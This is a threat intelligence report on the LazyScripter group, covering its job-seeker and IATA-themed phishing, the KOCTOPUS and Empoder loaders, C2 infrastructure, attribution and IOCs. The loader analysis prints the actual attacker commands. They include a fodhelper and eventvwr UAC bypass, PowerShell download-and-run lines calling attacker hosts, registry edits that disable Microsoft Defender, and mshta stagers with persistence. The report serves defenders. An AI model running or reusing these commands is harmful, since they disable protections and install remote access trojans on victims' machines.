### Threat Intelligence Report # LazyScripter: From Empire to double RAT ##### February 2021 Hossein Jazi ----- ## Table of Contents #### Executive Summary ................................................................. 3 Introduction ............................................................................ 4 Timeline of activities and phishing lures 6 Document analysis 11 Archive analysis 13 #### KOCTOPUS Analysis .............................................................. 15 Batch Variant 15 Ngrok 25 ADS-Backdoor 26 Executable Variant 27 Vbscript Variant 33 Registry key variant 33 Empoder 33 #### Infrastructure ........................................................................ 35 Attribution ............................................................................ 36 Conclusion ............................................................................ 37 Indicators of Compromise (IOCs) ........................................... 38 MITRE ATT&CK techniques ................................................... 42 ##### February 2021 ----- ## Executive Summary Malwarebytes’ Threat Intelligence analysts are continually researching and monitoring active malware campaigns and actor groups as the prevalence and sophistication of targeted attacks rapidly evolves. In this paper, we introduce a new APT group we have named LazyScripter, presenting in-depth analysis of the tactics, techniques, procedures, and infrastructure employed by this actor group. Although the observed TTPs have commonality with known actor groups, there are many notable differences setting LazyScripter apart from these groups; these similarities and differences are discussed in the Attribution section of this paper. APT groups are traditionally tracked according to specific targets and tools or methodologies they employ. Many actor groups use spam campaigns, attaching weaponized documents to phishing emails themed to target the industry or demographic of interest. In this case, we initially discovered a number of malicious emails specifically targeting individuals seeking employment, which prompted a deeper investigation. Digging deeper we uncovered a targeted spam campaign dating back as far as 2018 using phishing lures with themes aimed not only at those seeking immigration to Canada for employment, but also at airlines. In the following analysis, we walk through the timeline of observed TTPs from the initial phishing campaign to the state of the current and ongoing activities of the actor. We take a deep dive into each of the tools used, including the weaponized documents and the multiple variants of malware and exploitation techniques employed. Finally, we detail the infrastructure used and discuss the attribution comparisons with known actor groups such as APT28 and Muddy Water. This in-depth and detailed analysis has revealed a developing campaign by what we believe to be a previously unidentified APT actor. Not only has this campaign been active for several years, but ongoing tracking shows this actor is still maintaining the infrastructure used and is actively updating toolsets. For this reason, we continue to track this new group LazyScripter as the threat evolves. ----- ## Introduction In late December 2020 we observed a few malicious documents with embedded objects that were designed to target job seekers. The embedded objects were either VBScript or batch files that deployed two opensource multi-stage Remote Access Trojans (RATs): Octopus and Koadic. Interestingly, in some cases the attacker managed to drop other RATs such as LuminosityLink, RMS, Quasar, njRat and Remcos. This triggered our interest to further investigate this threat actor to understand its activities over the past few years. We were able to track them back to at least 2018 with a campaign targeting victims looking to immigrate to Canada. Over time they have used different file types as their initial lures, and they have switched their main toolset from PowerShell Empire to double RAT (Koadic and Octopus). This threat actor is targeting the International Air Transport Association (IATA) and airlines in which we observed several different lures specifically designed to target airlines that are using the BSPLink software. Most recently we observed that they have changed their lure to mimic a new feature recently introduced by IATA called IATA ONE ID (Contactless Passenger Processing tool). This indicates that this actor is constantly updating its toolsets to target new systems developed by IATA. ----- ## Phishing In all their phishing lures the actor has used its loader to spawn a combination of Octopus and Koadic (there were only a few cases with Koadic only). We were able to identify several different variants of this loader: executable, batch, VBScript, and registry files (in which persistence is achieved by writing a PowerShell script into the AutoRun registry key). We named this new loader as KOCTOPUS. This group also has used another loader around 2018 and 2019 to load PowerShell Empire. We named this loader Empoder. As a phishing lure they mainly used either IATA- or job-related themes to target victims. However, we have observed several other phishing lures that have been used by this actor. Here are some of them: - IATA security (International Air Transport Association security) - BSPlink Updater or Upgrade (BSPlink is the global interface for travel agents and airlines to access the IATA Billing and Settlement Plan (BSP)). - IATA ONE ID - User support kits for IATA users - Tourism (UNWTO) - COVID-19 - Microsoft Updates - Job information - Canada skill worker program - Canada Visa (CanadaVisa.com is the online presence of the Campbell Cohen Immigration Law Firm) Another interest of this actor is targeting people that want to immigrate to Canada through government jobrelated programs. In one of the specific cases the actor has used the legitimate "Canadavisa.com" site as its phishing lure. Canadavisa is a known Canadian immigration website associated with an immigration firm based in Montreal, Canada. This actor has mainly used spam emails weaponized with either archive or document files as it is initial infection vector. Both zip and document files contain a variant of either KOCTOPUS or Empoder and in some cases they are password protected. The actor has mainly used two GitHub accounts to host its toolsets. Both of these accounts were deleted on Jan 12 and 14 2021, respectively. - https://github[.]com/Axella49 - https://github[.]com/LIZySARA ----- Figure 1: GitHub account belonging to threat actor The actor created a new GitHub account on Feb 2nd 2021 to host its payloads to operate its new spam campaign: Figure 2: New GitHub repository ###### Timeline of activities and phishing lures We were able to collect some of the spam emails used by this actor over the past two years. In these spam emails the actor used several methods to redirect the user to download a variant of KOCTOPUS. The latest campaign was spotted on Feb 5th, 2021 in which the actor was distributing a variant of KOCTOPUS pretending to be “BSPLink Upgrade.exe” and managed to drop a variant of Quasar Rat in addition to OCTOPUS and Koadic. Prior to that we have spotted another campaign on Jan 6th, 2021 in which the actors were distributing a variant of KOCTOPUS pretending to be “IATA ONE ID.exe” software: ----- Figure 3: Latest spam campaign Figure 4: Latest spam campaign Here is the list of different lures used by this actor: - KOCTOPUS has been archived and distributed as an email attachment to victims. ----- Figure 5: Spam email variant 1 Figure 6: Spam email variant 2 - The spam email contains a PDF file with a link to download a variant of KOCTOPUS. Figure 7: Spam email variant 3 ----- Figure 8: Attached PDF file - The spam email contains a link that redirects the victim to download KOCTOPUS or a maldoc that has an embedded KOCTOPUS. The link usually is a URL shortener link using shortener services such as bit.ly or cutt.ly that redirects victims to either the attackers’ Github repository or the IP/URL address that hosts the maldoc. Figure 9: Spam email variant 3 On March 19th 2020, SANS ISC InfoSec Forums reported a multistage attack that took advantage of the COVID-19 pandemic to distribute its malware. This reported maldoc contains a variant of the KOCTOPUS malware we uncovered in this paper. In that phishing email the actor spoofed the World Health Organization and pretends to provide recommendations. We were able to identify multiple themes used by this actor and the time they have been used in spam campaigns. The following image shows the time frames of the different lures used by the actor. ----- Figure 10: Lures timeline ----- ###### Document analysis Unlike most actors that are using macros in their documents to perform malicious activities, this actor has embedded objects that are one of the KOCTOPUS or Empoder variants. We identified 14 malicious documents that have been used by this actor since 2018: Figure 11: List of maldocs used by this actor The malicious documents usually have one or two embedded objects with either PDF, Microsoft Word or Excel icons to pretend they are another document embedded in the doc while in fact they are either batch, executable, or VBScript variants of KOCTOPUS or Empoder. ----- Figure 12: Doc Template 1 ----- Figure 13: Doc Template 2 ###### Archive analysis The actor has not only relied on maldocs to deliver its loaders but also used archive files that have embedded a variant of KOCTOPUS or Empoder. The following shows the list of archive lures used by this actor since 2018: ----- Figure 14: List of archive files and their embedded objects ----- ## KOCTOPUS Analysis The actor has used this loader to load Octopus and Koadic and in some cases other RATs such as LuminosityLink RMS and Quadar RAT. This loader has four different variants which we will describe below. ###### Batch Variant The batch files used by this actor are highly obfuscated with the BatchEncryption tool. BatchEncryption is an advanced batch obfuscation tool that uses a combination of known and custom environment variable encoding techniques. Figure 15: Overall Process In this section we provide the analysis of a batch file embedded within the most recent maldoc used by this actor. The following shows the obfuscated version of KOCTOPUS: Figure 16: KOCTOPUS Batch Variant Obfuscated Figure 17 shows the list of commands that will be executed by this loader after de-obfuscation. Figure 17: KOCTOPUS Batch Variant Not Obfuscated ----- This loader starts it activities by checking the OS version using the following command: ``` for /f "tokens=2 delims=," %%i in ('wmic os get caption^,version /format:csv') do set os=%%i ``` Then it looks for number 10 using the find command to identify if the OS is Windows 10. If that is the case, it attempts to bypass User Access Control (UAC) using fodhelper.exe and execute its commands with higher privilege. If the OS version is not 10, it performs UAC bypass through Event Viewer (eventvwr.exe). _Fodhelper.exe has been used in Windows 10 to manage language settings. Since this process is running with_ highest privilege, an attacker can abuse it to execute its malicious commands with the same privilege fodhelper has. When the fodhelper.exe process starts it looks for the three registry keys shown below that by default do not exist. Therefore, an attacker can write its malicious commands in these registry keys to be executed by fodhelper.exe with the highest privilege. ``` HKCU:\Software\Classes\ms-settings\shell\open\command HKCU:\Software\Classes\ms-settings\shell\open\command\DelegateExecute HKCU:\Software\Classes\ms-settings\shell\open\command\(default) ``` This loader has created these registry keys with a PowerShell command: ``` && reg add HKCU\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f && reg add HKCU\Software\Classes\mssettings\shell\open\command /d "cmd.exe /c powershell -WindowStyle Hidden command \"IEX (New-Object Net.WebClient).DownloadFile('http://23.98.155.192/sc.bat',, 'C:\Users\Public\Libraries\sc.bat');\" C:\Users\Public\Libraries\sc.bat" /f ``` To execute the PowerShell command, fodhelper.exe needs to be executed: ``` && START /W fodhelper.exe ``` Upon fodhelper execution, PowerShell is executed to download a batch file from a remote server and save it into the Libraries directory and finally execute it. At the end the loader performs the cleanup procedure by deleting the created registry keys with the following command: ``` && reg delete HKCU\Software\Classes\ms-settings /f ``` If the OS version is not 10, Event Viewer is used to bypass UAC. When eventvwr.exe is executed it looks for mmc.exe in these two registry locations: ``` HKCU\Software\Classes\mscfile\shell\open\command HKCR\mscfile\shell\open\command ``` Since the first registry key does not exist then mmc.exe is executed from the second location to load the eventvwr.msc file in order to display the information to the user. An attacker can create this registry key that doesn’t exist in order to execute malicious commands with administrative privileges. In this case the actor has created this registry key with the same PowerShell command as described in the fodhelper.exe bypass. ``` reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "cmd.exe /c powershell -WindowStyle Hidden -command \"IEX (New-Object Net.WebClient).DownloadFile('http://23.98.155.192/sc.bat', 'C:\Users\Public\Libraries\sc.bat');\" C:\Users\Public\Libraries\sc.bat" /f ``` ----- The downloaded batch file (sc.bat) has also been obfuscated using the BatchEncryption tool. After deobfuscation we can see this batch performs the following steps: - Using reg.exe to disable, add or delete all registry keys related to Microsoft Defender and Microsoft Security Essentials. Also, it disables all the Scheduled tasks related to these security products by calling schtasks: ``` reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run " /v "Windows Defender" /f reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f ``` ----- ``` reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f ``` - Calling PowerShell.exe to download another batch file. The actor has used another URL shortener “is.gd” which redirects to a Github repository to download that batch file: ``` powershell -WindowStyle Hidden -command "IEX (New-Object Net.WebClient).DownloadFile('https://is.gd/xbQIQ2','C:\Users\Public\Librarie s\pus.bat');" C:\Users\Public\Libraries\pus.bat ``` The pus.bat script is also obfuscated by the BatchEncryption tool and executes the following PowerShell command. This command connects to its server to deploy its first multi-stage RAT which is Octopus: ``` powershell -w hidden "Add-Type -AssemblyName System.Core;IEX (New-Object Net.WebClient).DownloadString('http://hpsj.firewall gateway.net:80/hpjs.php');" ``` - Performing the following actions which in fact make both Octopus and Koadic persistence through both the AutoRun registry key and scheduled task. ###### Koadic Persistence: ``` reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "#OneDrive" /t REG_SZ /d "cmd /c powershell -w hidden \"Add-Type AssemblyName System.Core;IEX (New-Object Net.WebClient).DownloadString('http://hpsj.firewallgateway.net:80/hpjs.php');\"" Powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile noexit -c Invoke-Command -ScriptBlock { schtasks /create /TN AutomaticChromeUpdater /TR 'mshta http://hpsj.firewallgateway.net:8080/MicrosoftUpdate' /SC minute /mo 60} "C:\WINDOWS\system32\schtasks.exe" /create /TN AutomaticChromeUpdater /TR "mshta http://hpsj.firewall-gateway.net:8080/MicrosoftUpdate" /SC minute /mo 60 ``` ----- ###### Octopus Persistence: ``` reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "New Value #1" /t REG_SZ /d "mshta http://hpsj.firewall gateway.net:8080/MicrosoftUpdate" /f powershell Add-MpPreference ExclusionPath "C:" -FORCE Powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile noexit -c Invoke-Command -ScriptBlock { schtasks /create /TN AutomaticU /TR 'C:\Users\Public\Libraries\pus.bat' /SC minute /mo 120} "C:\WINDOWS\system32\schtasks.exe" /create /TN AutomaticU /TR C:\Users\Public\Libraries\pus.bat /SC minute /mo 120 ``` The first PowerShell command downloads the Octopus PowerShell agent from the following URL: http://hpsj[.]firewall-gateway[.]net:80/hpjs.php. This agent has been obfuscated by the attacker. Figure 18: Loading Koadic The Octopus agent is responsible for communicating with its C&C server to send and receive commands. To start its communications, it collects the following information from the victim machine: - Host name (with the addition of five random characters to the end) - User name (if the user name has the administrator role it adds “*” to it) - OS version - OS architecture - The process id that is executing this PowerShell script - Victim’s Network domain Then it builds a header with the following format: ----- ``` $HEADER = "$hostname, $username, $OS_version, $OS_arch, $process_id, $domain" ``` In the next step, it encrypts the header using AES encryption and then encodes the generated encrypted header using Base64. The Key and IV for encryption are Base64 hardcoded. Figure 19: Encryption function Then it sends an HTTP get request to its server with the generated header as authorization header field. Figure 20: Http get request After sending the request, it goes into a loop to receive commands from the server. The received commands are specific to the victim and the generated URL is the combination of the C&C URL and generated host name. The received commands are Base64 encoded and AES encrypted and therefore it first decodes and decrypts the commands and then based on the commands it does the required actions. ----- Figure 21: Commands Here is the list of commands: - False: If the command is False it does nothing. - Report: It collects victim’s info including list of all of the running processes, local IP address, OS version, last boot time, OS locale and current time and then encrypts and Base64 encodes them and sends them in the authorization HTTP field to the server. - Download: Upload the content of a specified file to the server. - reset-pc: It seems this feature is not still implemented. It also deploys another variant of Octopus agent through JavaScript (mshta http://hpsj[.]firewall_gateway[.]net:8080/hta). This script calls the PowerShell to download the Octopus agent._ ----- Figure 22: Js script Figure 23: PowerShell command after deobfuscation After deploying Octopus it deploys Koadic by calling mshta: ``` "mshta http://hpsj.firewall-gateway.net:8080/MicrosoftUpdate" /f powershell Add-MpPreference -ExclusionPath "C:" -FORCE ``` The actor has used mshta and rundll32.exe for Koadic stagers. ``` "C:\Windows\System32\rundll32.exe" http://hpsj.firewall gateway.net:8080/MicrosoftUpdate?PPVXCF8Y4U=2368b7b9facb4a3b8acf72d29ea28704 ;UGH09GLI5P=;\..\..\..\./mshtml,RunHTMLApplication ``` Figure 24 shows the downloaded first stage. This script defines 4 random strings with the following sizes: 101, 118, 97, and 108. These strings’ lengths have been used to build the “eval” by converting each string size number to char. In the next step the obfuscated script that will be executed by eval is deobfuscated by passing it to the deobfuscation function (jRclebKBKY). At the end that deobfuscated script is executed by calling eval. ----- Figure 24: Downloaded js Figure 25: Deobfuscated js The deobfuscated script collects the following information from the victim and then builds a URL and command and makes an HTTP request to the Koadic server. - Checks SeDebugPrivilege through “whoami /all” command - Gets OS version and Build by reading their relative registry locations - Gets group policy history through reading registry location - Gets processor architecture - Lists directories in temp folder - Gets the contents of the IP routing table by executing the “route print” command - Gets computer name and username - Gets Windows code page ----- Figure 26: Data collection In this case, we observed that Koadic acted as a downloader to download and execute RMS, LuminosityLink. In some other cases, the actor used Koadic to drop njRat, Remcos and Quasar RAT. ``` "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -command "& { (New-Object Net.WebClient).DownloadFile('https://cutt.ly/0hakgDJ', 'C:\Users\Public\Libraries\1.exe')};" C:\Users\Public\Libraries\1.exe "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -command "& { (New-Object Net.WebClient).DownloadFile('https://cutt.ly/agV2Ekk', ``` ----- ``` 'C:\Users\Public\Libraries\Setup-RMS.exe')};" C:\Users\Public\Libraries\Setup-RMS.exe @echo off taskkill /f /im rutserv.exe taskkill /f /im rfusclient.exe reg delete "HKLM\SYSTEM\Remote Manipulator System" /f attrib +s +h "C:\Windows\System32\vipcatalog" cd C:\Windows\System32\vipcatalog\ "rutserv.exe" /silentinstall regedit /s regedit.reg "rutserv.exe" /start @exit ``` ###### Ngrok We have observed some other variants of KOCTOPUS where the actor first deployed a modified version of [Invoke-](https://github.com/benyG/Invoke-Ngrok) [Ngrok](https://github.com/benyG/Invoke-Ngrok) which is a PowerShell script that exposes local ports of a victim over the internet. This script has an embedded Base64 encoded payload that is decoded and stored in the Libraries directory pretending to be RuntimeBroker.exe. This dropped payload achieved persistence through the AutoRun registry key and a scheduled task. After deploying Ngrok, the loader has deployed both Octopus and Koadic RATs. ----- Figure 27: Invoke Ngrok ###### ADS-Backdoor In another case, we observed that the actor has tried to use the ADS-Backdoor which is a backdoor persistent module of [Nishang](https://github.com/samratashok/nishang) Framework. Nishang is an open-source PowerShell-based framework for offensive security, penetration testing, and red teaming. ``` powershell.exe -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://cutt.ly/nfPs6qP'); Checking -URL https://cutt.ly/0fPs6VQ -Arguments "CHECK"" ``` ----- Figure 28: ADS-Backdoor ###### Executable Variant We were able to find 7 executables associated with KOCTOPUS. All of these executables have been compiled using Pure Basic and have the same compile date (February 1st 2018) and almost all of them were recently uploaded to VirusTotal. Having the same compile time might indicate that they have been developed or modified by an automated tool. After further analysis we identified that all of these samples have been generated using a Bat to Exe Converter tool. In fact, the actor has used a tool to convert its batch loader to an executable. The compile time is predefined in this application and does not show the right compilation time. We believe the right compilation time is around the time that the sample has been uploaded to VirusTotal. ----- Figure 29: Bat to exe convertor The samples are using different names to pretend they are legitimate applications. Here are some of the names used by these samples: - “IATA ONE ID.exe”: This has been distributed through a spam campaign on Jan 6[th], 2021. It is using the IATA ONE ID icon to pretend it is that software. ONE ID is a fairly recent concept introduced by IATA for contactless identity management that leverages biometric technology. This indicates that this actor is constantly monitoring new IATA technologies to update its toolsets respectively. - “BSPlinkUpdaterV4.exe”: Similar to the “IATA ONE ID” this has been specifically designed to target airlines that are using BSPLink software. - “Federal Skilled Worker Program Eligible Occupations Canada Immigration and Visa Information Canada.exe”: This is designed to target people that are applying to the Canada skill worker program. The actor has used decoy documents from a Canada Immigration website (Figure 30 and Figure 31). ----- Figure 30: Decoy document ----- Figure 31: Decoy document The actor has used several different icons for these executables. Among them we observed one that is an old Malwarebytes icon possibly pretending to be our security software. ----- Figure 32: Used icons This Bat to Exe Converter encrypts the batch loader into its resource section. The executable loads the resource, decrypting its content and then executing the batch file. Here is the main process of this loader: - It creates a directory in the %APPDATA%/Temp directory and then creates a batch file in that directory. The name of the directory and batch files are generated randomly. Figure 33: Create Directory - It looks for resources by their hashes and loads them using the LoadResource API call. This executable contains 2 resources. One of them has been used to generate a key for the RC4 encryption algorithm. The other one is the batch file content that has been encrypted. ----- Figure 34: Load Resource - It generates the RC4 key from the resource. - It decrypts the content of the other resource and writes it into that created batch file. (The encryption key is 6A2148ADADF8D6E529B08D8BD0800A85). - It calls cmd.exe to execute the generated bat file using CreateProcessW. Figure 35: RC4 decryption ----- ###### Vbscript Variant The KOCTOPUS vbscript variant has the same functionality as we mentioned in the batch variant with the difference that process execution has been started by a VBScript that calls wscript to execute a PowerShell command. This PowerShell command downloads the batch variant of KOCTOPUS. All of the VBScript files are obfuscated to make analysis more difficult. In the VBA variant, the actor has used the URL shortener cutt.ly to hide its real URL which in this case is a GitHub repository hosted at raw.githubusercontent.com. ``` "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -command "IEX (New-Object Net.WebClient).DownloadFile('https://cutt.ly/fgOTMj0',, 'C:\Users\Public\Libraries\reguac.bat');" C:\Users\Public\Libraries\reguac.bat ``` ###### Registry key variant This variant sets the AutoRun registry key with a Powershell command that downloads and executes the batch variant of KOCTOPUS. Fiigure 36: Reg variant ###### Empoder Prior to using Koadic as the main RAT this actor has used PowerShell Empire as its main toolset. To load PowerShell Empire the actor has used its Empire Loader which we call Empoder. Figure 37: WinRaR installer In fact, the actor has just used a VBS file to load PowerShell Empire, but it has wrapped its VBS into a WinRar installer which is usually bundled with a decoy document. As an example, “Canada Visa.exe” is a WinRar installer that has two bundled files: a VBS file and a decoy PDF document. This one is specifically designed to target users of Canada Visa, a Canadian immigration law firm based in Montreal, Canada. The decoy document was taken from the Canada Visa website. ----- Figure 38: Canada Visa decoy document ----- ## Infrastructure The actor has leveraged dynamic DNS providers for command-and-control communications. Dynamic DNS providers allow people to create free subdomains on shared domains and as you can see the actor has created five subdomains on four different dynamic DNS domains for the communications. - kasperskylab.ignorelist.com - hpsj.firewall-gateway.net - googlechromeupdater.twilightparadox.com - iatassl-telechargementsecurity.duckdns.org - stub.ignorelist.com Figure 39: Infrastructure ----- ## Attribution We have examined TTPs, toolsets and infrastructure used by this actor to attribute it to any of the known threat actors. Even though some similarities between this actor and documented APT actors such as APT28 and OilRig exist, these indicators are not enough to attribute to any of these groups. - [APT28 has used Koadic Rat in its past campaigns; the only similarity between them is the use of Koadic](https://unit42.paloaltonetworks.com/unit42-sofacy-groups-parallel-attacks/) open-source tool which is not a strong indicator to show any connections between them. - [OilRig](https://unit42.paloaltonetworks.com/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/) has used the batch to exe tool to convert its PowerShell scripts into executables. This is a good indicator that can show there is some overlap between this actor and OilRig but there are still some major differences between them that makes us believe they are separate groups. The most similar APT actor to the actor we analyzed in this report is Muddy Water. Here is the list of similarities between them: - Both have used Koadic and Empire in their previous campaigns - Both have used scripting languages such as PowerShell in their campaigns - Both have used GitHub to host their malicious payloads/scripts. Similar to Muddy Water this actor has added forks of some popular toolsets to add some legitimacy to its Github account - Both have used scheduled tasks and Registry Run Keys / Startup Folder for persistence However, there are some key differences between them: - Muddy Water has employed targeted spear phishing attacks to perform its operations while this actor relies on spam campaigns - This actor has employed several open-source frameworks and commercial malware such as Octopus, Nishang, Quasar, Remcos, njRAT, RMS, NetWire and LumosityLink RAT that have not been used by Muddy Water - Unlike Muddy Water that has used macro-weaponized maldocs, this actor has not used macro-embedded documents and instead it directly embeds its loader within the maldocs - Muddy Water has used some custom toolsets such as PowerStats and SharpStats while this actor mainly relies on open-source toolsets to perform its operations In terms of used infrastructure, we have seen several APT groups that have used dynamic DNS for their C&C communications including Scarlet Mimic, Putter Panda, Turla, Patchwork and APT33. More specifically Scarlet Mimic and Putter Panda have used the same free DNS provider “firewall-gateway.net” for their C&C communications. Still, we have not found any other similarities between these APTs and the actor we analyzed in this report except using a free DNS provider which is not reliable in the attribution process. Based on the differences we provided in this section we believe this is a new actor that has not been documented before and therefore we have decided to track this actor as a new group that we call LazyScripter. ----- ## Conclusion In this paper, we uncovered several campaigns associated to an actor group that we believe has been active since 2018. Here are its main characteristics: - Uses open-source offensive security toolsets for different stages of its attack kill-chain including PowerShell Empire, Koadic RAT, Octopus RAT, Nishang and Invoke-Ngrok - Hosts payloads and scripts mostly on GitHub - Uses scripting languages in its attacks: batch, VBScript, PowerShell and JavaScript - Uses spam campaigns to spread its KOCTOPUS loader - Mainly targets IATA and people looking for jobs (in particular those who want to immigrate to Canada through the skill workers program) - Usually uses two multi-stage backdoors in its attacks - Uses commercially available RATs in its attacks including Quasar, LuminosityLink, Remcos, njRAT, Adwind and RMS - Uses a Batch encryption tool to encrypt all of its batch loaders - Uses embedded objects within the maldocs instead of using macros ----- ## Indicators of Compromise (IOCs) |Indicators of Compromise (IOCs)|Col2| |---|---| |SHA-256 Filename|| |2d845bd6662e7449f4db7a922e67c665df70cd045af48e2cb3d689a5d0004b2f|Detail.doc| |2e016bca305b1fd0c360d1e7334956a967f48f8fddf6ba272556959769919e24|canadavisa.doc| |240ed00d58e9d34bea58a29c8195d530a86d87c7575b3f699d7c512fd1bc9233|Fiche_de_renseignement_2 5R9924N502567.docx.docx| |7099cdd24bb1eb0dbe3ab1bc1995e3e5cf577b2d232e088d948c8ff749b73795|k.doc| |87b1b71337ae7bc237d677fd6559ea6432facb27252fcefcac24bb6132ae8ac8|List of JOBS.doc| |785c2845af631f33fda47b5a0fe5ccb338389b15e028e1ae7fa418d991e2c38f|LIST OF JOBS.doc| |64cdfec0be049dd92388b1e5d8a5ef130907c8ea6a2a1f61564fd865892d24e8|Information All JOBS.doc| |eadae73398980c346cf5783b2f1119cc8af3619ce405f32b943b56013c27d597|Information All Jobs.doc| |c3379e83cd3e8763f80010176905f147fcc126b5e7ad9faa585d5520386bd659|Recommendations Corona Virus.doc| |f46200110df685967fe3521360be461b1204f8f39a2aa785c4885fe3f142082b|Details of Offers.doc| |51a631cf0940341f2682a84993b782e2c015ff2181a4c8894e38617643c6a4ca|COVID-19 & Travelers.doc| |2d845bd6662e7449f4db7a922e67c665df70cd045af48e2cb3d689a5d0004b2f|Job Details.Doc| |ba6cc16770dc67c1af1a3e103c3fd19a854193e7cd1fecbb11ca11c2c47cdf04c|Hiring and working conditions.do| |905ef0ae8f5173b917a4f39063346825f4b23ae75cb4b3190300cb064bd002b9|COVID-19 & Travelers.doc| |24a5c386efc5a5804374dcd92b0678d21cab637dadec124b5bed1fcd75c2bbd4|JOB_SEARCH_FORM.pdf.zip| |d3bd27edb6ae36518039ffcee592e4a1017d16fe4753ea2c92010a41ef9c4cac|Federal_Skilled_Worker_Pro gram_Eligible_Occupations_ _Canada_Immigration_and_ Visa_Information._Canad.pd f.exe| |1b819105e0971ebbcdc3ce4b5f317a8269370198ed369e1cdae9cdeb1c18c460|JOB_SEARCH_FORM.pdf.exe| |0e5c1ff7ee751ed6c3ac9b22ddb7e35eaba24dd8b96a8f233b8c32d29cb012f5|IATA_Secure.zip| ----- |30c952a2a74d3c55b85f69638599d4f79d1684f37435a18e18879f4c5df39223|IATA_Secure.bat| |---|---| |b18da5a6fac54acd62d08fd40e16745e6ed6c076ff38144ffe9ae25786134700|MS-CV2020X-Update.zip| |1df686dd9367ecd6bba2e9d03cd130e854f097fad3b5d0f58fbe839e310feb5e|MS-CV2020X-Update.reg| |9936e7b3bd979e55b53f323bb70936a8e63c4852b42c9e0db6b42ddc97792dc0|JOB_INFORMATION.zip| |07ae89016f95d512776efc1e7cbc188f2fa2e3bc23333d2361690628940ffdaa|APPWEB_IATA.zip| |14007fd206b747305392b9f8712afab5dd14b2efe4e62a0e26a4e8df6933fd67|APPWEB_IATA.exe| |5b0f07aeb3bf79de8845b603bdf6f2db33fe4e5cef833b036c9834694cac9f5d|Detail.zip| |1b9e3a0e57de9a2ab43d04fa9ca32194209b794f03a232db3e8776e80e083c9b|Detail.pdf.exe| |56d6ea4c914404d73499da8004594cb8844d87fa471be5a26db305cf6c9576af|SSL_IATA_UPDATER.zip| |1df686dd9367ecd6bba2e9d03cd130e854f097fad3b5d0f58fbe839e310feb5e|SSL_IATA_UPDATER.reg| |730306cfa87a3cc1567c9fa580319b25e594453381e414c8b79b674c53ad50bb|BSPlinkUpdaterV4.zip| 